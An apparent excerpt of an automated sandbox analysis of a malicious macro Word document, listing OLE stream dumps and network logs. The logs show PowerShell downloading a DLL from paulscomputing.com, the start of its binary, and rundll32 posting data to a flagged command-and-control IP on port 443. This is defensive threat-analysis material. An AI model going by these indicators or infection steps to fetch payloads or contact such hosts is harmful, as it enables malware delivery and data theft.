                                          Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                          General
                                          Stream Path:Macros/UserForm4/o
                                          File Type:empty
                                          Stream Size:0
                                          Entropy:0.0
                                          Base64 Encoded:False
                                          Data ASCII:
                                          Data Raw:
                                          Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                          General
                                          Stream Path:Macros/UserForm5/\x1CompObj
                                          File Type:data
                                          Stream Size:97
                                          Entropy:3.61064918306
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                          General
                                          Stream Path:Macros/UserForm5/\x3VBFrame
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:266
                                          Entropy:4.62202697924
                                          Base64 Encoded:True
                                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                          Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                          General
                                          Stream Path:Macros/UserForm5/f
                                          File Type:data
                                          Stream Size:38
                                          Entropy:1.54052096453
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                          General
                                          Stream Path:Macros/UserForm5/o
                                          File Type:empty
                                          Stream Size:0
                                          Entropy:0.0
                                          Base64 Encoded:False
                                          Data ASCII:
                                          Data Raw:
                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5945
                                          General
                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                          File Type:data
                                          Stream Size:5945
                                          Entropy:5.2694333372
                                          Base64 Encoded:False
                                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                          Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                          Stream Path: Macros/VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 1035
                                          General
                                          Stream Path:Macros/VBA/dir
                                          File Type:VAX-order 68K Blit (standalone) executable
                                          Stream Size:1035
                                          Entropy:6.65461326361
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * l \\ C . . . . v . m . ! O . f f i c . g O
                                          Data Raw:01 07 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 b2 af d0 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                          Stream Path: WordDocument, File Type: data, Stream Size: 42542
                                          General
                                          Stream Path:WordDocument
                                          File Type:data
                                          Stream Size:42542
                                          Entropy:3.70237315313
                                          Base64 Encoded:False
                                          Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . l . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 6c a0 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a6 00 00 70 61 21 5c 70 61 21 5c 6c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          01/07/21-13:54:12.758890TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 84916880192.168.2.22184.66.18.83

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 7, 2021 13:53:53.281829119 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.471307993 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.471399069 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.473644972 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.662899971 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783752918 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783786058 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783798933 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783811092 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783823967 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783840895 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783859015 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783874989 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783890009 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783912897 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.783921003 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.783927917 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.783941984 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973426104 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973453045 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973469019 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973486900 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973503113 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973515987 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973526001 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973540068 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973560095 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973577023 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973586082 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973601103 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973613977 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973623991 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973639011 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973656893 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973661900 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973676920 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973687887 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973699093 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973715067 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973732948 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973738909 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973757029 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973764896 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973783016 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973798990 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973818064 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:53.973823071 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.973850012 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:53.974246025 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163232088 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163259029 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163270950 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163284063 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163371086 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163415909 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163479090 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163496971 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163516045 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163526058 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163542986 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163551092 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163567066 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163582087 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163603067 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163609982 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163628101 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163645029 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163655043 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163672924 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163678885 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163695097 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163708925 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163718939 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163733959 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163743973 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163758039 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163774967 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163790941 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163799047 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163816929 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163826942 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163842916 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163858891 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163873911 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163882971 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163902044 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163911104 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163925886 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163942099 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163955927 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163964033 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.163981915 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.163991928 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.164006948 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.164022923 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.164048910 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.164055109 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.164072990 CET8049167216.218.207.98192.168.2.22
                                          Jan 7, 2021 13:53:54.164083004 CET4916780192.168.2.22216.218.207.98
                                          Jan 7, 2021 13:53:54.164099932 CET8049167216.218.207.98192.168.2.22

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 7, 2021 13:53:53.204132080 CET5219753192.168.2.228.8.8.8
                                          Jan 7, 2021 13:53:53.270642996 CET53521978.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Jan 7, 2021 13:53:53.204132080 CET192.168.2.228.8.8.80x2c09Standard query (0)paulscomputing.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Jan 7, 2021 13:53:53.270642996 CET8.8.8.8192.168.2.220x2c09No error (0)paulscomputing.com216.218.207.98A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • paulscomputing.com
                                          • 167.71.148.58
                                            • 167.71.148.58:443

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249167216.218.207.9880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampkBytes transferredDirectionData
                                          Jan 7, 2021 13:53:53.473644972 CET0OUTGET /CraigsMagicSquare/H/ HTTP/1.1
                                          Host: paulscomputing.com
                                          Connection: Keep-Alive
                                          Jan 7, 2021 13:53:53.783752918 CET1INHTTP/1.1 200 OK
                                          Date: Thu, 07 Jan 2021 12:53:53 GMT
                                          Server: Apache
                                          Cache-Control: no-cache, must-revalidate
                                          Pragma: no-cache
                                          Expires: Thu, 07 Jan 2021 12:53:53 GMT
                                          Content-Disposition: attachment; filename="yERd2O.dll"
                                          Content-Transfer-Encoding: binary
                                          Set-Cookie: 5ff70461abcd9=1610024033; expires=Thu, 07-Jan-2021 12:54:53 GMT; Max-Age=60; path=/
                                          Last-Modified: Thu, 07 Jan 2021 12:53:53 GMT
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Transfer-Encoding: chunked
                                          Content-Type: application/octet-stream
                                          Data Raw: 31 66 34 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 93 4c 43 1d f2 22 10 1d f2 22 10 1d f2 22 10 03 a0 b7 10 0f f2 22 10 03 a0 a1 10 61 f2 22 10 1d f2 23 10 64 f2 22 10 3a 34 59 10 1a f2 22 10 03 a0 a6 10 25 f2 22 10 03 a0 b0 10 1c f2 22 10 03 a0 b6 10 1c f2 22 10 03 a0 b3 10 1c f2 22 10 52 69 63 68 1d f2 22 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 48 e2 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 4a 01 00 00 58 02 00 00 00 00 00 75 7a 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 97 a2 04 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 a7 01 00 49 00 00 00 ac 9f 01 00 3c 00 00 00 00 f0 01 00 fc d5 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 d4 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 89 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 77 48 01 00 00 10 00 00 00 4a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b9 47 00 00 00 60 01 00 00 48 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 32 00 00 00 b0 01 00 00 16 00 00 00 96 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 fc d5 01 00 00 f0 01 00 00 d6 01 00 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0a 23 00 00 00 d0 03 00 00 24 00 00 00 82 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: 1f40MZ@!L!This program cannot be run in DOS mode.$YLC""""a"#d":4Y"%""""Rich"PELH_!JXuz`pI<@`\.textwHJ `.rdataG`HN@@.data2@.rsrc@@.reloc#$@B


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.2249171167.71.148.58443C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Jan 7, 2021 13:55:12.868716002 CET250OUTPOST /ta2men4jqfnerm/ HTTP/1.1
                                          DNT: 0
                                          Referer: 167.71.148.58/ta2men4jqfnerm/
                                          Content-Type: multipart/form-data; boundary=------------------NYbEqHIaKH4WS2W1Iv
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: 167.71.148.58:443
                                          Content-Length: 7684
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Jan 7, 2021 13:55:14.076057911 CET259INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 07 Jan 2021 12:55:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 63 38 34 0d 0a 74 e0 f8 78 b7 df 89 29 60 91 cd 9d ab 96 e9 6a a2 8f 64 8f 86 a3 c4 80 6c a2 8c bf 37 6c 34 83 9d 07 8c 63 d2 09 7e 21 65 bf 64 a5 a3 3c c8 e5 3b 3d 01 67 45 5f 57 db c0 59 b6 8b 94 1d bb 8a fc 72 c5 81 b0 75 8e e6 7c bc 2c 8a f2 19 64 e2 e6 c7 c7 b6 18 dc f0 cc f0 2d d6 ed b3 1a 45 c6 ec 22 33 c0 63 41 54 ae 7d 8c 54 62 97 9b 86 5e f9 ae 0e a1 c6 65 ce d8 64 c5 b0 c9 c0 8b 9d 6c cd 10 c6 cd 03 b9 71 52 d9 ac a5 51 ba 9a fa 44 32 a3 f3 c9 54 d9 36 b0 ce a3 72 e5 6e 78 5a 6d e0 3d 22 8a c2 f7 76 96 37 1f f2 43 a7 27 b0 35 55 e5 19 99 77 a3 64 60 b2 06 c5 6e 15 58 24 7d d1 1d f3 04 7e 79 74 56 f3 56 0b 8a 8b 1c f1 d0 1b cf e3 d2 fe 11 46 55 82 48 cb a1 ee e5 c0 c8 46 0a 15 f1 88 23 81 a8 b5 89 c7 4e bd 52 08 53 be 28 19 c0 4d 09 bb 39 ce 5a 6a db e4 f8 7e 22 80 0a c0 10 6e 38 67 59 71 53 ca e3 b5 b0 18 05 9d 07 fb a5 8d 8f d6 5d 0b 46 9d 27 4c 24 e7 45 bc b7 ec 38 11 17 2a ef 54 b4 95 8b 79 7b fa 03 7a d5 4f ca 4e 11 ff 50 29 d1 ce 88 18 2b 1e 48 9b e2 b8 f0 df 47 c1 59 8a 18 34 e4 0f a8 a6 c9 53 41 62 d1 87 49 2e 96 d3 25 5d f4 f5 7d 61 e7 d4 29 f9 67 d9 35 5b 33 65 65 ef d9 df 6e 6f f8 16 69 24 02 fb 25 cd 4e f9 b8 f7 a5 93 62 6d 2e 0f b5 83 44 29 43 d3 77 32 b6 99 3c b3 8e a7 bb 77 66 3f eb 78 e9 a7 10 07 3e bb a9 a3 b9 87 e3 59 ad b4 84 1d 01 21 81 b8 44 01 a3 c5 80 8c c1 7a 75 cd 2b 5b 86 c4 00 21 b5 57 6d 43 47 74 3e 9b d1 75 8e 59 8a c0 eb bf a8 37 a9 0a b6 fe 64 fa ba 07 62 b6 fb e5 aa 6f fa 5b a5 49 e8 27 07 ec bd 98 99 01 f8 75 0d 20 2f 7b 77 88 e3 4c a9 34 f9 0c 4e 6f a0 ed 62 6c 03 83 b7 ac 1f 33 4d 84 a4 a4 cf ac 07 0e 0b 8f ca 0a 5c b8 53 29 e3 44 4b 83 29 5a 73 58 61 12 50 77 76 db 26 81 26 fc d9 9e 95 25 83 ab e8 68 0d 58 a9 27 7d 97 70 03 75 ac 06 d3 24 5d a7 c7 f1 d9 4c 82 7b ed 85 d7 1c c6 b4 bf 46 44 0a 2f 12 8c 6c ed f5 e3 63 a5 53 f8 26 25 4c 4e 69 b3 27 d3 17 17 2d 4f 1c 36 f5 9c 5c a0 e1 79 1f 20 c3 af 34 18 68 1c 73 0e da db ea d1 b1 69 3e 24 2c 72 7f 51 a5 4f d1 5f 9a d3 5d 34 cd a7 c1 f8 6d 49 f0 b5 92 71 38 23 48 37 4e 0e 2b fe ef 1b 58 d5 6c 69 b4 87 56 6a 22 7b 22 71 0f 2c f8 9e 0e 6f 4e 96 18 ed f8 e7 b3 76 d5 e8 85 f3 46 cd 60 54 aa 3b cc cf f1 23 aa 90 89 c6 96 7f 5f 53 16 a1 8a bb aa e2 8f 16 26 58 a1 c1 72 d0 63 d7 c2 29 3f 40 64 80 9a b9 c2 a8 aa ae 0f 91 07 2e 46 23 df 57 01 13 f2 92 4b 07 b3 01 3e 90 68 24 82 0a d2 dc c0 32 4a 3f 36 54 95 90 d3 76 a4 19 2d 5d 2a d0 b0 20 23 43 fd 49 2c 9d 27 0f 3e e6 ee 7f 01 13 1d 2d 4e 89 2f 6f 66 10 7f 37 13 f1 c8 27 0c 1f 28 64 d1 a6 4b 70 69 5f db 27 5d 5b 2f 5b c4 99 c1 9e 2f b2 86 eb 45 cd 82 2d c3 e6 7c dc 45 85 43 c2 ae d0 41 b1 15 68 c6 30 47 8c 61 aa 7b 6b c3 1d ab d9 40 3a ce 5c e3 72 e8 9d ac 5e 26 59 54 1a e3 50 56 9d da a9 03 ad 18 22 7d 97 c2 eb f5 68 72 c6 96 f3 e8 06 28 f3 8d 20 90 23 d2 aa f7 b8 ae 99 c7 78 1e cd 1e 69 12 81 52 f3 39 2f ca 15 b7 3b b5 82 4b 1f 04 97 38 fc 92 90 d6 97 05 3a 44 cf d6 22 c3 36 6b 4d 02 81 00 42 5b 2b ee c4 35 f9 10 a1 e3 44 da b9 92 e9 2c bd c5 72 81 5c 2c e7 99 20 e7 1b e8 67 ef 54 22 3a 68 e9 6f 10 5c de 08 af 97 17 3e 88 00 45 40 ec 92 32 85 0b 4b 5a 7a 8b 7e b3 b9 23 2b 2c 45 98 06 e3 64 8e 89 78 e1 da 92 bd df 15 41 0b fc 55 62 be 48 e9 11 5a c6 14 12 20 80 b7 88 2f 95 d5 5e 08 2b c2 34 1a 38 05 1d 7f fe f4 83 cc d3 50 ed 2f 4c 28 bb a1 d5 f9 ca 8a 03 3c 83 37 e7 d9 a7 b0 0f 2c b9 c1 a5 91 40 58 5b 26 85 15 41 f7 81 3d 58 8e d7 0a d5 77 6c 37 42 c1 51 8f 92 a6 fc 51 35 b8 ee 5f 3a d8 86 25 b8 c3 4a 5d 99 63 32 b5 49 df 79 11 6b 11 86 3d 2c 4a 3f ad d1 04
                                          Data Ascii: c84tx)`jdl7l4c~!ed<;=gE_WYru|,d-E"3cAT}Tb^edlqRQD2T6rnxZm="v7C'5Uwd`nX$}~ytVVFUHF#NRS(M9Zj~"n8gYqS]F'L$E8*Ty{zONP)+HGY4SAbI.%]}a)g5[3eenoi$%Nbm.D)Cw2<wf?x>Y!Dzu+[!WmCGt>uY7dbo[I'u /{wL4Nobl3M\S)DK)ZsXaPwv&&%hX'}pu$]L{FD/lcS&%LNi'-O6\y 4hsi>$,rQO_]4mIq8#H7N+XliVj"{"q,oNvF`T;#_S&Xrc)?@d.F#WK>h$2J?6Tv-]* #CI,'>-N/of7'(dKpi_'][/[/E-|ECAh0Ga{k@:\r^&YTPV"}hr( #xiR9/;K8:D"6kMB[+5D,r\, gT":ho\>E@2KZz~#+,EdxAUbHZ /^+48P/L(<7,@X[&A=Xwl7BQQ5_:%J]c2Iyk=,J?


                                          Code Manipulations

